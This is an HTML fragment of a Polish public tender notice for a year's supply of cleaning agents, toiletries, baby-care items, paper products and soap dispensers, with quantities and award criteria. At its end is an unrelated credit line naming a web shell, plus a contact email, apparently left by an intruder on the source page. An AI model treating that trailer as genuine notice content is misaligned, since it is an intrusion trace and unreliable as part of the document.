6. Krem do rąk, tubka 75 ml - 3324 szt.<br>
7. Płyn do mycia szyb z rozpylaczem, butelka 0,5 l - 108 szt.<br>
8. Płyn do WC, butelka 750 ml - 68 szt.<br>
9. Szampon do włosów, butelka 300 ml - 708 szt.<br>
10. Szampon do włosów dla dzieci, butelka 300 ml - 108 szt.<br>
11. Krem do golenia - 72 szt.<br>
12. Maszynki do golenia - 700 szt.<br>
13. Emulsja do mycia i pielęgnacji silnie zabrudzonych rąk (z dodatkiem pumeksu), usuwająca z dłoni zabrudzenia tj.: olej, smary, lakiery, farby, smołę, kleje itp. Emulsja przeznaczona do usuwania zabrudzeń o dużej intensywności z możliwością codziennego stosowania bez obawy uszkodzenia naskórka i dłoni, opakowanie 3, 78 l - 10 szt.<br>
14. Druciak - 48 szt.<br>
15. Zmywak gąbka 9,5x6,5cm x1cm - 672 szt.<br>
16. Denaturat, butelka 0,5 l - 48 szt.<br>
17. Koncentrat do posadzek wodoodpornych w szczególności do posadzek błyszczących i zabezpieczonych powłokami akrylowymi. Pozostawiający cienką powłokę, odporną na zabrudzenia, długotrwały i świeży zapach o wysokiej skuteczności mycia połączonej z doskonałymi właściwościami pielęgnacyjnymi. Nie zawierający wosków, mydła i pochodnych eteru. Zawierający anionowe związki powierzchniowo czynne, etoksylowany alkohol tłuszczowy 1-2%, substancje zapachowe, alkiloeterosiarczany 1-2%, pH 6,9-7,1 koncentratu w kolorze zielonym, stężenie 0,5 - 2%, opakowanie o pojemności 1 l - 192 l<br>
18. Koncentrat do wszystkich zmywalnych powierzchni takich jak: szkło, marmur, emalia, plastik, drewno. Pozostawiający długotrwały, świeży zapach, nie pozostawiający smug . Zawierający anionowe związki powierzchniowo czynne, etoksylowany alkohol tłuszczowy 1-2%, substancje zapachowe, alkiloeterosiarczany 1-2%, ph koncentratu 6,9- 7,1 ,w kolorze niebieskim, stężenie 0,5 - 2 %, opakowanie o pojemności 1 l - 48 l<br>
19. Koncentrat do wszystkich powierzchni odpornych na działanie kwasów, posiadający doskonałe właściwości w usuwaniu kamienia, osadów wapniowych i wszelkich zabrudzeń z powierzchni sanitarnych, pozostawiający długotrwały i świeży zapach. Nie uszkadzający czyszczonych powierzchni. Zawierający niejonowe związki powierzchniowo czynne, kwas amidosiarkowy 5-10%, etoksylowany alkohol tłuszczowy 2-5 %, substancje zapachowe, pH koncentratu 0,4-0,6, kolor czerwony, stężenie 0,5-2%, opakowanie o pojemności 1 l - 36 l<br>
20. Płyn do mycia butelek, smoczków bezpieczny dla dziecka, usuwający białka mleka, substancje zagęszczające nie zawierający barwników ani wybielaczy, nieperfumowany, konstrukcja płynna, bezbarwny, ph neutralne dla skóry, zawierający naturalne enzymy: proteazy i mannanazy, butelka 0,38 l - 450 l<br>
21. Ścierki jednorazowe w kolorze białym o wymiarach 32 x 39 cm, opakowanie 50 - 100 szt. - 21600 szt.<br>
22. Pianka do mycia niemowląt z możliwością stosowania u noworodków. Opakowanie dostosowane do systemu typu Dermados (dotyczy opakowań 400 ml), będących w posiadaniu zamawiającego<br>
opakowanie 200ml - 120 szt.<br>
opakowanie 400 ml - 132 szt.<br>
23. Oliwka dla niemowląt, opakowanie 200 ml - 216 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 39.51.42.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - dostawa papieru toaletowego i ręczników papierowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Papier toaletowy na rolce, nie pylący o gramaturze powyżej 30 g/m2, szerokość rolki 9,6- 10 cm, waga rolki min 110 g, długość minimum 28m - 1248 rolek<br>
2. Ręcznik papierowy na rolce, pakowany po dwie sztuki, niepylący o szerokości min 22 cm, gramaturze min 40 g/m2 , długość rolki min 12 m - 480 rolek<br>
3. Ręczniki papierowe w rolce, białe do wycierania rąk bez perforacji dostosowany do dozownika Matic o wymiarach  wys. 37,2cm szer. 33,7cm gł. 20,3cm . Ręczniki dwuwarstwowe muszą być wykonane z włókien pierwotnych w technologii TAD oraz włókien przetworzonych.  Jaskrawość- białość powyżej 80%, metoda wybielania bez zawartości chloru. Długość rolki 150m w przeliczeniu na mb, wymiar odcinka 21x25 cm, średnica całkowita rolki 19cm, podstawowa gramatura nie mniejsza niż 23/18,5(g/m2) - 168 rolek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.10.00-2, 33.76.30.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - dostawa dozowników do mydła..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ścienne, łokciowe dozowniki do preparatów dezynfekcyjnych oraz mydła w płynie z:<br>
- możliwością dezynfekcji wszystkich elementów i regulacją dozowanego preparatu<br>
- wyjmowaną pompką i wyjmowanym wkładem dozownika,<br>
- dozowanie preparatu od góry pojemnika<br>
- regulacja dozowania 0,5 - 1,5 ml<br>
- możliwość demontażu dozownika bez konieczności użycia narzędzi<br>
- możliwość zamontowania tacki chroniącej przed zalaniem podłogi<br>
- możliwość zamontowania kolorowych ramion dozownika.<br>
Obudowa zewnętrzna dozownika:<br>
- wykonana z tworzywa sztucznego typu ABS (w kolorze białym), odpornego na częste stosowanie środków dezynfekcyjnych<br>
- o gładkiej, łatwej w utrzymaniu czystości powierzchni<br>
- z wizjerem informującym o zużyciu preparatu bez elementów metalowych i transparentnych.<br>
Otwieranie dozownika bez konieczności użycia kluczyka - 500 ml - 250 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.17.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com